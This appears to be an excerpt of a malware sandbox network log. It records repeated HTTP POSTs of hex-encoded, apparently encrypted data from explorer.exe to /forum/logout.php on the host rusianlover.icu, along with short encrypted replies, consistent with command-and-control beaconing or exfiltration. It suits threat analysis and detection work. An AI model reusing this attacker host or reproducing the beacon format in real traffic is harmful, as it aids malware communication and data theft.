Mar 10, 2021 11:42:59.927165985 CET	10014	OUT	POST /forum/logout.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: rusianlover.icu Content-Length: 649 Cache-Control: no-cache Data Raw: 6f 63 71 65 73 67 75 69 3d 44 38 31 32 42 33 42 30 45 41 33 33 45 45 43 30 46 38 33 32 34 31 46 45 41 45 38 42 31 32 41 37 36 37 26 6d 79 6b 77 69 75 3d 35 35 33 32 30 31 31 36 26 71 67 77 6d 3d 34 44 31 42 43 33 36 35 36 35 39 38 30 42 32 43 34 41 31 45 38 42 35 46 43 30 36 44 45 43 32 41 46 38 41 38 38 33 37 36 43 30 41 43 31 39 38 34 34 43 44 38 41 43 37 33 38 37 34 43 44 41 32 34 31 44 35 34 34 33 34 38 33 37 33 35 44 31 46 37 34 30 33 31 30 32 35 45 41 39 30 44 38 37 33 37 46 35 38 35 41 31 35 30 43 35 34 34 46 42 31 43 33 38 35 36 30 36 43 42 45 34 32 43 46 43 46 32 39 38 33 39 32 46 38 44 42 43 37 30 43 37 37 31 38 36 35 36 45 36 41 41 32 44 45 34 41 44 30 46 41 30 33 45 31 30 31 35 36 32 34 43 37 31 46 33 41 32 44 34 39 30 43 32 36 42 43 39 39 46 39 31 42 32 43 39 32 37 43 43 33 38 39 46 30 39 35 43 44 35 34 38 37 33 34 36 38 42 39 42 37 45 41 33 30 36 44 39 39 36 36 39 37 30 43 30 37 32 41 38 35 45 39 32 41 34 38 33 36 43 33 30 39 41 42 45 43 45 41 38 38 44 44 45 41 46 37 30 37 46 38 41 33 38 34 43 33 44 36 30 45 31 35 37 43 35 31 39 34 38 32 35 38 30 37 37 33 41 32 38 37 31 34 33 39 32 38 42 32 35 31 44 39 46 34 39 35 34 35 36 44 39 32 31 30 46 36 30 39 32 37 42 36 45 46 43 34 38 36 45 33 42 37 38 31 46 41 41 42 33 32 34 46 42 45 41 46 31 46 32 33 31 46 30 33 37 43 33 34 33 31 46 41 36 36 36 39 44 45 46 31 46 42 31 41 32 41 30 36 46 35 36 37 38 44 41 36 44 44 36 41 31 42 31 41 34 36 33 43 37 37 38 43 44 38 46 44 33 34 30 42 43 44 37 33 41 39 43 35 32 44 41 36 37 34 35 44 30 35 31 38 35 45 38 34 38 33 46 30 36 41 41 36 32 44 36 41 37 30 45 43 31 45 39 30 41 43 33 44 35 31 45 41 32 31 44 44 41 31 46 30 41 33 33 31 45 44 41 36 39 33 38 38 42 39 38 44 31 31 45 42 37 41 37 44 43 44 30 30 37 42 37 35 34 36 42 45 45 34 39 45 45 41 35 33 34 39 38 44 45 31 45 45 34 39 32 36 46 41 35 43 43 38 43 46 37 39 44 31 30 39 44 38 42 39 36 33 33 34 38 35 37 32 45 42 30 30 43 32 30 37 42 33 34 42 44 38 37 34 42 37 35 36 37 Data Ascii: ocqesgui=D812B3B0EA33EEC0F83241FEAE8B12A767&mykwiu=55320116&qgwm=4D1BC36565980B2C4A1E8B5FC06DEC2AF8A88376C0AC19844CD8AC73874CDA241D5443483735D1F74031025EA90D8737F585A150C544FB1C385606CBE42CFCF298392F8DBC70C7718656E6AA2DE4AD0FA03E1015624C71F3A2D490C26BC99F91B2C927CC389F095CD54873468B9B7EA306D9966970C072A85E92A4836C309ABECEA88DDEAF707F8A384C3D60E157C519482580773A287143928B251D9F495456D9210F60927B6EFC486E3B781FAAB324FBEAF1F231F037C3431FA6669DEF1FB1A2A06F5678DA6DD6A1B1A463C778CD8FD340BCD73A9C52DA6745D05185E8483F06AA62D6A70EC1E90AC3D51EA21DDA1F0A331EDA69388B98D11EB7A7DCD007B7546BEE49EEA53498DE1EE4926FA5CC8CF79D109D8B963348572EB00C207B34BD874B7567
Mar 10, 2021 11:42:59.998224020 CET	10015	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Wed, 10 Mar 2021 10:43:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 64 0d 0a 74 33 65 42 28 36 bd 33 df 4e 99 46 35 94 3c d3 34 5f 80 a5 71 7e ef ba 21 08 14 e2 c4 66 fb be 8d 92 cd 17 4b eb 87 8b fe 44 c3 bc 0d dd 4e 31 6f 65 14 c5 f7 28 37 18 f3 31 f3 7f ce 51 e1 90 85 a6 34 ed d5 24 bc 9a 33 63 b5 55 d6 cc 40 8d 44 13 08 9e 67 b4 e6 b6 b4 ab ec 33 40 0f 26 53 5f 05 4c db 87 45 5b 5f 32 4f e4 14 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6dt3eB(63NF5<4_q~!fKDN1oe(71Q4$3cU@Dg3@&S_LE[_2O0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.5	49742	212.114.52.43	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:43:02.820017099 CET	10093	OUT	POST /forum/logout.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: rusianlover.icu Content-Length: 671 Cache-Control: no-cache Data Raw: 73 6b 69 61 3d 32 34 44 46 46 32 37 35 37 46 43 35 45 32 34 38 32 43 36 32 42 36 36 45 39 46 32 44 33 45 44 36 37 30 34 43 38 39 31 45 32 30 33 46 45 41 37 44 46 46 42 30 42 38 36 32 26 71 67 63 73 69 65 75 71 3d 31 39 33 33 34 33 35 36 26 75 6f 6f 69 63 63 3d 33 45 36 37 38 39 37 46 42 31 45 39 43 45 32 31 34 41 41 36 37 32 41 32 31 42 35 38 35 41 34 42 39 32 34 37 33 37 34 31 37 34 46 44 34 38 45 32 32 34 44 45 31 33 30 38 37 44 41 33 44 44 32 45 45 39 35 43 41 41 35 42 44 31 37 30 43 39 32 31 39 37 42 32 30 31 41 38 34 43 41 36 44 36 31 42 45 45 31 36 45 38 43 46 33 44 39 42 33 34 46 35 35 45 34 43 37 34 38 43 45 42 41 43 37 39 34 34 34 38 43 46 45 44 39 33 43 39 35 30 42 32 36 34 32 39 46 36 39 43 41 38 39 36 46 44 36 35 35 42 38 37 30 44 32 37 42 38 32 35 34 38 41 32 46 44 34 44 37 44 44 32 32 33 35 34 39 32 37 36 37 36 42 45 43 32 41 30 36 30 37 39 46 32 38 42 44 33 32 45 32 39 44 33 34 44 35 31 32 34 43 37 46 34 42 38 37 38 45 32 45 32 35 35 35 33 38 41 38 32 45 45 33 39 39 41 32 44 46 44 38 31 36 46 46 39 42 38 35 31 31 43 35 30 34 45 36 46 39 30 34 33 33 45 31 36 38 41 34 43 36 34 42 31 32 45 44 45 44 45 31 32 32 31 41 46 39 34 41 42 35 41 43 43 36 41 30 45 32 33 32 36 43 34 31 37 37 32 39 43 37 34 38 39 32 36 32 39 35 41 41 43 45 41 34 46 46 34 43 32 46 38 39 36 43 30 39 32 38 45 43 42 38 41 44 45 41 43 34 30 39 34 46 37 45 43 43 43 31 38 35 45 37 36 38 37 39 31 37 38 45 46 45 42 37 34 35 37 45 41 45 36 34 44 41 45 37 33 33 32 33 38 33 41 44 43 34 32 34 33 34 42 32 39 46 44 35 41 32 30 37 39 41 31 33 35 38 34 34 37 35 31 43 36 31 38 36 46 43 34 45 33 37 37 34 45 34 46 34 36 44 38 46 44 41 43 41 34 33 37 41 39 33 42 43 32 36 45 44 32 45 43 37 30 44 30 39 43 45 34 36 31 45 41 38 46 45 39 45 35 42 39 34 38 43 33 32 43 30 31 43 32 41 41 43 34 37 44 46 43 43 43 31 41 33 31 45 39 44 31 34 35 39 31 38 44 46 30 39 39 46 46 41 31 46 32 44 41 42 44 35 35 31 33 38 33 31 45 38 33 38 32 41 44 36 44 39 43 42 31 36 32 32 39 37 30 31 35 42 46 36 35 44 31 41 36 35 30 32 44 30 34 32 43 Data Ascii: skia=24DFF2757FC5E2482C62B66E9F2D3ED6704C891E203FEA7DFFB0B862&qgcsieuq=19334356&uooicc=3E67897FB1E9CE214AA672A21B585A4B9247374174FD48E224DE13087DA3DD2EE95CAA5BD170C92197B201A84CA6D61BEE16E8CF3D9B34F55E4C748CEBAC794448CFED93C950B26429F69CA896FD655B870D27B82548A2FD4D7DD22354927676BEC2A06079F28BD32E29D34D5124C7F4B878E2E255538A82EE399A2DFD816FF9B8511C504E6F90433E168A4C64B12EDEDE1221AF94AB5ACC6A0E2326C417729C748926295AACEA4FF4C2F896C0928ECB8ADEAC4094F7ECCC185E76879178EFEB7457EAE64DAE7332383ADC42434B29FD5A2079A135844751C6186FC4E3774E4F46D8FDACA437A93BC26ED2EC70D09CE461EA8FE9E5B948C32C01C2AAC47DFCCC1A31E9D145918DF099FFA1F2DABD5513831E8382AD6D9CB162297015BF65D1A6502D042C
Mar 10, 2021 11:43:02.893014908 CET	10094	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Wed, 10 Mar 2021 10:43:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 64 0d 0a 74 33 65 42 28 36 bd 33 df 4e 99 46 35 94 3c d3 34 5f 80 a5 71 7e ef ba 21 08 14 e2 c4 66 fb be 8d 92 cd 17 4b eb 87 8b fe 44 c3 bc 0d dd 4e 31 6f 65 14 c5 f7 28 37 18 f3 31 f3 7f ce 51 e1 90 85 a6 34 ed d5 24 bc 9a 33 63 b5 55 d6 cc 40 8d 44 13 08 9e 67 b4 e6 b6 b4 ab ec 33 40 0f 26 53 5f 05 4c db 87 45 5b 5f 32 4f e4 14 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6dt3eB(63NF5<4_q~!fKDN1oe(71Q4$3cU@Dg3@&S_LE[_2O0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.5	49743	212.114.52.43	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:43:05.646526098 CET	10095	OUT	POST /forum/logout.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: rusianlover.icu Content-Length: 672 Cache-Control: no-cache Data Raw: 7a 65 6a 69 6e 3d 37 46 43 31 41 31 39 33 36 39 36 35 31 42 38 41 44 37 41 42 33 31 37 33 34 31 32 31 30 38 44 46 42 45 34 43 30 42 33 36 31 46 34 37 34 44 37 45 37 43 35 45 36 44 26 78 61 64 61 64 67 6a 67 6a 3d 37 39 36 34 32 34 36 39 26 62 69 70 71 78 65 6c 3d 42 38 41 38 37 39 39 39 42 46 37 44 41 43 45 43 45 36 46 39 46 34 45 36 34 44 46 42 32 34 33 35 46 34 38 37 42 43 44 32 33 34 42 30 46 30 33 46 30 30 32 36 36 31 31 33 41 31 43 32 41 34 46 41 37 36 36 38 37 45 36 33 41 42 32 44 38 30 38 45 41 30 34 43 42 38 44 42 37 30 38 45 30 42 38 42 42 33 33 31 32 38 41 37 34 33 43 38 32 34 43 41 42 39 35 34 42 37 34 36 41 35 45 42 42 39 38 44 35 43 36 36 35 41 34 35 36 46 34 33 45 34 43 43 30 39 32 33 39 34 33 36 46 32 31 42 42 37 37 37 45 33 42 42 33 39 37 43 38 42 33 41 46 34 32 35 39 43 46 35 34 43 32 33 32 43 33 43 43 36 45 39 35 45 32 36 38 46 43 46 37 30 38 44 32 34 36 34 43 37 33 34 34 30 35 33 42 39 45 46 46 42 38 34 33 41 44 34 43 38 39 44 32 41 41 34 34 38 39 30 46 32 30 41 31 32 46 35 37 46 38 30 36 36 41 43 31 41 43 45 38 38 35 44 41 39 41 41 35 38 38 33 31 36 30 31 37 30 31 43 35 38 36 35 43 30 30 30 46 34 36 44 42 45 31 39 33 33 46 38 36 44 34 34 37 36 42 33 39 36 44 43 43 34 41 37 32 43 36 35 30 44 32 44 32 36 36 39 33 46 41 33 31 32 45 38 33 44 30 30 34 44 39 34 44 36 38 42 38 32 37 31 41 38 33 45 41 32 42 39 35 37 45 34 45 38 38 31 39 32 46 30 41 39 44 37 33 34 34 34 30 31 30 46 43 37 38 36 31 44 31 42 44 42 38 39 36 36 32 31 41 35 41 42 42 41 45 38 30 32 36 34 35 44 37 32 44 35 32 41 36 42 46 39 41 37 38 43 33 37 37 42 32 38 37 35 45 31 45 37 31 34 33 32 43 45 36 45 37 39 46 42 46 43 42 35 39 33 44 32 33 44 46 31 36 30 37 35 41 38 46 43 41 45 41 38 34 36 42 35 41 33 45 41 39 38 35 44 32 43 32 46 37 41 34 45 42 37 45 35 36 35 41 33 41 46 45 46 45 46 30 36 35 36 37 32 30 35 41 31 41 39 39 42 30 31 43 30 43 42 43 43 30 46 44 43 37 43 38 36 46 46 46 32 39 37 37 45 39 37 30 45 46 43 31 42 34 33 41 30 32 32 45 37 46 45 41 45 41 31 30 31 44 42 43 30 41 33 39 45 39 41 35 43 Data Ascii: zejin=7FC1A19369651B8AD7AB3173412108DFBE4C0B361F474D7E7C5E6D&xadadgjgj=79642469&bipqxel=B8A87999BF7DACECE6F9F4E64DFB2435F487BCD234B0F03F00266113A1C2A4FA76687E63AB2D808EA04CB8DB708E0B8BB33128A743C824CAB954B746A5EBB98D5C665A456F43E4CC09239436F21BB777E3BB397C8B3AF4259CF54C232C3CC6E95E268FCF708D2464C7344053B9EFFB843AD4C89D2AA44890F20A12F57F8066AC1ACE885DA9AA58831601701C5865C000F46DBE1933F86D4476B396DCC4A72C650D2D26693FA312E83D004D94D68B8271A83EA2B957E4E88192F0A9D73444010FC7861D1BDB896621A5ABBAE802645D72D52A6BF9A78C377B2875E1E71432CE6E79FBFCB593D23DF16075A8FCAEA846B5A3EA985D2C2F7A4EB7E565A3AFEFEF06567205A1A99B01C0CBCC0FDC7C86FFF2977E970EFC1B43A022E7FEAEA101DBC0A39E9A5C
Mar 10, 2021 11:43:05.717017889 CET	10096	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Wed, 10 Mar 2021 10:43:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 64 0d 0a 6f 04 f6 0d ff 25 09 4c b5 a1 06 02 35 83 f3 0c bc af d0 3b 6a 20 13 d0 cc 42 50 cf f2 d8 54 74 9e 02 e8 9e b8 c2 80 85 f3 61 99 6f 2f 02 ed fa a6 14 5d 8e ec 46 01 cf d0 e8 14 fb fd d9 8b 61 48 a7 df 7e fe b8 a3 cc 44 5e d9 a0 40 70 90 ac c0 08 4d a8 75 00 d3 d4 97 10 93 41 96 af 16 c9 59 57 fa 73 fe 84 65 bc 5a 88 79 59 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6do%L5;j BPTtao/]FaH~D^@pMuAYWseZyY0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.5	49744	212.114.52.43	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:43:08.461410999 CET	10097	OUT	POST /forum/logout.php?id=1106076 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: rusianlover.icu Content-Length: 637 Cache-Control: no-cache Data Raw: 73 71 6f 6d 6b 69 3d 38 65 30 62 38 33 64 33 35 62 64 38 32 35 61 65 32 66 37 34 37 33 26 71 6d 69 65 3d 37 38 31 33 37 37 33 36 26 75 75 75 75 75 75 75 75 3d 37 63 66 65 66 38 62 64 62 34 38 66 63 37 32 32 61 34 61 30 65 31 38 33 30 62 36 64 38 34 63 62 66 31 36 61 62 37 66 63 66 37 36 61 61 64 38 37 35 39 61 30 61 38 61 31 32 34 30 37 35 32 38 37 66 34 62 36 32 38 33 35 62 31 62 30 64 66 33 61 63 64 65 34 66 33 63 65 38 30 38 66 65 36 34 30 38 39 64 33 36 34 32 62 38 39 65 66 63 32 38 37 30 61 37 33 61 38 30 31 63 31 37 64 36 30 32 37 61 65 35 65 33 31 30 63 64 63 33 39 64 64 61 62 35 65 62 32 62 38 64 62 34 65 31 65 30 37 32 64 39 33 38 66 36 30 35 64 66 31 32 65 61 65 38 38 30 36 37 63 62 37 34 30 62 30 32 61 66 31 64 39 61 64 65 38 34 62 36 35 34 66 64 38 63 34 35 33 64 35 38 61 37 37 39 32 38 64 31 30 63 63 37 39 36 36 64 37 66 31 36 33 31 37 36 32 65 66 65 36 63 31 64 35 66 66 35 32 37 63 31 31 65 63 37 30 65 36 33 65 39 37 38 30 37 39 66 37 66 30 30 36 37 35 66 36 38 38 61 66 65 62 65 61 64 30 39 66 31 30 37 65 66 39 32 32 34 61 65 30 37 33 38 66 35 37 37 66 64 63 31 37 33 65 37 64 32 33 37 61 65 39 37 32 65 65 38 31 66 62 39 39 33 30 65 64 35 65 62 33 66 33 63 33 65 66 65 65 65 38 34 34 62 33 66 39 38 65 61 65 66 39 35 37 39 62 35 62 33 64 35 39 37 64 33 37 66 37 31 38 32 64 38 62 32 32 66 32 31 36 30 38 34 37 37 34 65 39 35 34 62 34 37 34 31 32 62 38 33 34 61 34 64 30 62 31 63 35 34 38 32 62 30 66 39 38 38 36 65 30 31 39 30 36 30 33 32 30 38 39 63 63 61 62 39 31 65 63 35 62 33 66 31 38 66 37 63 38 65 34 63 37 32 35 64 33 65 31 62 33 38 63 32 39 63 39 66 63 33 35 66 39 35 65 65 63 36 32 35 64 62 39 38 30 65 61 35 31 63 64 37 64 64 38 39 34 33 30 37 61 62 63 32 34 62 32 66 30 32 62 39 36 63 65 39 36 66 36 37 64 61 62 31 61 39 61 37 61 65 36 35 31 32 33 64 63 33 66 31 32 66 32 38 35 30 30 61 36 30 38 62 62 30 35 63 38 38 30 35 38 30 37 37 36 36 66 63 30 63 39 37 35 38 30 Data Ascii: sqomki=8e0b83d35bd825ae2f7473&qmie=78137736&uuuuuuuu=7cfef8bdb48fc722a4a0e1830b6d84cbf16ab7fcf76aad8759a0a8a124075287f4b62835b1b0df3acde4f3ce808fe64089d3642b89efc2870a73a801c17d6027ae5e310cdc39ddab5eb2b8db4e1e072d938f605df12eae88067cb740b02af1d9ade84b654fd8c453d58a77928d10cc7966d7f1631762efe6c1d5ff527c11ec70e63e978079f7f00675f688afebead09f107ef9224ae0738f577fdc173e7d237ae972ee81fb9930ed5eb3f3c3efeee844b3f98eaef9579b5b3d597d37f7182d8b22f216084774e954b47412b834a4d0b1c5482b0f9886e01906032089ccab91ec5b3f18f7c8e4c725d3e1b38c29c9fc35f95eec625db980ea51cd7dd894307abc24b2f02b96ce96f67dab1a9a7ae65123dc3f12f28500a608bb05c8805807766fc0c97580
Mar 10, 2021 11:43:08.529418945 CET	10098	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Wed, 10 Mar 2021 10:43:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 64 0d 0a 78 6a 53 41 a5 e4 58 2b e4 4a 2d 10 34 3a 6d e9 1c bb 7c 26 15 ee 78 82 9b a7 f4 3e f8 2f b9 f1 f4 b4 cf 6e 27 1e b9 8c 41 47 76 01 c4 39 21 64 46 e8 dc b8 85 ba 86 31 af 54 39 1f 9c b6 7c 37 d6 26 5e 88 26 b7 95 bc 4a 81 a9 79 0c 41 73 36 57 b2 53 02 f3 ed a5 e2 39 42 8e 04 9c 85 ea 2e e2 0d 0b e7 60 cc 31 c7 f2 fa d6 f3 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6dxjSAX+J-4:m\|&x>/n'AGv9!dF1T9\|7&^&JyAs6WS9B.`10

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.5	49745	212.114.52.43	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:43:11.286036968 CET	10099	OUT	POST /forum/logout.php?id=3125771 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: rusianlover.icu Content-Length: 665 Cache-Control: no-cache Data Raw: 77 73 6f 6b 6d 69 3d 33 38 34 31 31 32 46 42 38 43 45 30 39 35 42 34 45 46 37 34 44 46 35 33 32 43 37 46 45 35 34 41 44 42 30 30 33 38 34 31 42 38 37 38 34 42 44 35 41 34 26 75 6f 69 63 3d 39 34 35 34 33 34 37 36 26 79 77 75 73 77 75 73 71 3d 34 37 44 39 45 31 39 44 31 39 42 43 30 37 45 33 42 43 41 30 42 41 37 31 39 42 31 42 45 30 46 32 31 45 43 36 33 33 31 30 34 30 46 39 38 46 43 46 32 34 30 42 33 34 46 46 38 30 36 44 34 43 37 39 36 31 31 35 33 34 45 43 41 36 41 35 39 44 46 33 39 34 33 39 46 41 46 38 45 42 31 33 34 41 32 33 37 32 42 42 37 43 30 33 30 32 41 37 38 33 32 42 37 42 42 43 45 32 38 42 35 36 39 37 38 30 39 44 30 37 31 35 35 33 44 31 35 36 45 39 36 44 42 42 45 32 38 46 39 35 42 30 30 45 35 41 41 43 30 32 43 39 38 35 41 30 35 33 34 33 41 34 44 35 36 33 36 43 32 35 37 35 38 43 42 31 38 38 36 34 43 35 38 44 38 33 42 43 33 46 34 33 45 38 33 39 32 38 32 41 38 42 45 46 45 37 46 37 36 31 46 34 41 37 36 43 38 42 42 33 36 42 35 30 37 34 36 46 31 39 31 30 36 37 39 39 46 30 30 32 30 36 46 38 31 33 36 36 32 33 36 37 33 43 31 45 44 38 43 43 41 45 35 45 39 37 34 39 39 32 33 31 46 30 31 37 45 45 44 36 45 34 34 43 43 36 31 34 44 34 42 43 35 34 32 43 39 32 45 37 35 32 41 31 32 44 43 46 32 35 36 41 42 38 30 39 31 32 44 39 32 38 42 37 43 42 41 36 31 32 31 39 38 31 38 41 30 46 34 31 35 39 42 32 44 44 32 34 42 43 46 39 41 39 36 37 43 44 39 45 36 37 36 45 43 39 46 31 34 46 41 46 38 32 35 46 31 45 45 37 42 45 39 46 36 46 44 45 44 32 38 43 37 35 34 31 30 31 34 34 32 32 37 32 37 31 46 30 31 31 35 33 43 41 30 44 45 31 31 43 39 32 46 45 46 33 34 35 46 42 42 41 37 44 35 46 46 39 35 34 43 33 45 45 34 38 33 33 43 34 42 30 45 45 36 38 39 32 45 38 41 33 32 43 46 31 39 44 38 31 36 45 30 36 34 45 44 30 46 43 36 42 36 36 39 32 45 45 35 37 46 33 43 35 45 30 32 36 43 31 34 43 34 42 45 37 32 31 46 43 37 37 41 32 39 39 35 42 42 33 31 39 34 39 35 31 33 45 37 42 41 36 43 34 31 34 35 34 30 43 37 32 41 31 43 30 38 34 41 39 33 31 39 35 31 42 33 39 45 46 38 33 30 42 35 31 37 35 38 46 42 30 41 33 Data Ascii: wsokmi=384112FB8CE095B4EF74DF532C7FE54ADB003841B8784BD5A4&uoic=94543476&ywuswusq=47D9E19D19BC07E3BCA0BA719B1BE0F21EC6331040F98FCF240B34FF806D4C79611534ECA6A59DF39439FAF8EB134A2372BB7C0302A7832B7BBCE28B5697809D071553D156E96DBBE28F95B00E5AAC02C985A05343A4D5636C25758CB18864C58D83BC3F43E839282A8BEFE7F761F4A76C8BB36B50746F19106799F00206F8136623673C1ED8CCAE5E97499231F017EED6E44CC614D4BC542C92E752A12DCF256AB80912D928B7CBA61219818A0F4159B2DD24BCF9A967CD9E676EC9F14FAF825F1EE7BE9F6FDED28C75410144227271F01153CA0DE11C92FEF345FBBA7D5FF954C3EE4833C4B0EE6892E8A32CF19D816E064ED0FC6B6692EE57F3C5E026C14C4BE721FC77A2995BB31949513E7BA6C414540C72A1C084A931951B39EF830B51758FB0A3
Mar 10, 2021 11:43:11.355935097 CET	10100	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Wed, 10 Mar 2021 10:43:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 64 0d 0a b8 d4 1c 57 12 c0 42 45 e6 ae 86 21 e0 eb 9c 7e 2c 98 64 db 77 df 52 b4 ce 61 29 71 dc eb 70 3c 4f ba 33 f9 34 82 0c a9 e8 40 87 90 46 3d c8 6b d9 39 0e 52 01 c8 8e 80 3a af c3 3d 44 3a de 11 13 0f 30 b9 6a be 8f 7a 5e 83 8b de 02 57 c2 f5 28 c2 bf 0c 15 c4 99 be de 31 84 21 1a 03 f8 1d 2b 7a fb ec b9 4c 79 dc a0 fb 91 c6 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6dWBE!~,dwRa)qp<O34@F=k9R:=D:0jz^W(1!+zLy0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.5	49747	212.114.52.43	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:43:14.102725983 CET	10111	OUT	POST /forum/logout.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: rusianlover.icu Content-Length: 653 Cache-Control: no-cache Data Raw: 6b 75 6b 75 3d 66 62 62 64 62 66 30 36 33 35 66 39 31 37 30 36 63 30 34 63 39 33 39 30 39 38 32 66 33 64 37 35 63 33 64 64 64 66 26 69 71 65 6d 61 69 77 65 3d 32 33 38 30 34 38 34 32 26 6d 79 71 63 75 67 3d 44 42 39 43 37 33 36 30 33 37 45 37 35 44 35 45 43 41 39 41 33 37 42 42 45 45 34 42 39 39 44 46 30 46 42 38 44 42 31 32 38 34 45 30 45 44 32 34 36 39 32 41 42 41 39 30 33 46 31 31 44 31 45 39 31 32 39 33 36 33 35 37 44 30 30 36 38 45 31 38 36 41 44 37 39 35 39 46 35 30 31 34 31 33 43 30 42 36 36 42 45 32 45 39 35 37 35 35 43 37 31 44 42 45 35 34 41 32 43 33 41 30 38 33 32 36 42 37 33 34 38 33 38 37 33 44 34 36 43 38 41 38 30 38 42 41 36 39 30 33 33 43 35 42 30 38 34 32 44 44 33 35 38 31 38 46 33 36 46 33 43 32 33 35 43 42 34 32 44 34 31 36 41 43 35 34 35 44 46 31 45 34 34 43 34 31 42 31 38 32 43 44 31 44 33 35 30 35 36 32 37 43 35 46 35 45 32 37 37 42 33 37 38 42 39 38 41 37 46 30 33 39 33 30 44 34 39 37 46 33 38 41 45 43 31 30 46 38 36 33 44 39 34 39 34 46 43 42 39 31 44 37 34 33 35 44 44 39 44 37 44 42 46 33 30 34 44 35 37 31 30 30 33 32 38 30 43 32 38 37 41 46 36 45 45 36 38 42 36 45 42 36 35 45 31 37 42 32 41 45 45 30 35 33 35 38 35 42 42 33 39 31 35 37 34 36 42 32 46 34 37 41 31 38 33 44 39 44 31 41 43 45 44 33 30 42 30 39 36 31 37 39 38 43 46 41 32 37 30 45 39 30 46 35 33 37 42 39 31 35 35 39 36 32 44 43 35 43 45 42 33 46 41 32 32 33 33 33 39 38 37 33 34 39 33 44 38 34 42 46 35 33 33 45 41 46 34 45 33 33 34 37 30 39 38 38 38 38 38 43 43 32 32 45 31 46 41 32 41 46 38 35 39 42 38 31 37 41 44 41 37 41 37 43 34 39 37 33 30 41 42 30 30 42 30 46 31 45 43 38 36 33 31 41 42 43 44 41 38 46 45 36 32 36 46 30 42 42 30 37 36 36 45 44 38 39 45 41 38 34 32 41 46 33 31 42 36 36 37 34 31 43 37 44 44 33 39 42 45 46 31 33 38 45 37 31 32 32 46 41 30 43 39 41 36 44 36 46 45 44 45 32 34 32 39 46 36 33 38 41 36 39 45 38 44 30 31 42 34 44 41 39 41 33 38 41 32 41 35 41 41 33 35 41 38 30 43 43 30 38 42 32 42 34 36 34 38 34 46 37 37 43 34 44 Data Ascii: kuku=fbbdbf0635f91706c04c9390982f3d75c3dddf&iqemaiwe=23804842&myqcug=DB9C736037E75D5ECA9A37BBEE4B99DF0FB8DB1284E0ED24692ABA903F11D1E912936357D0068E186AD7959F501413C0B66BE2E95755C71DBE54A2C3A08326B73483873D46C8A808BA69033C5B0842DD35818F36F3C235CB42D416AC545DF1E44C41B182CD1D3505627C5F5E277B378B98A7F03930D497F38AEC10F863D9494FCB91D7435DD9D7DBF304D571003280C287AF6EE68B6EB65E17B2AEE053585BB3915746B2F47A183D9D1ACED30B0961798CFA270E90F537B9155962DC5CEB3FA223339873493D84BF533EAF4E33470988888CC22E1FA2AF859B817ADA7A7C49730AB00B0F1EC8631ABCDA8FE626F0BB0766ED89EA842AF31B66741C7DD39BEF138E7122FA0C9A6D6FEDE2429F638A69E8D01B4DA9A38A2A5AA35A80CC08B2B46484F77C4D
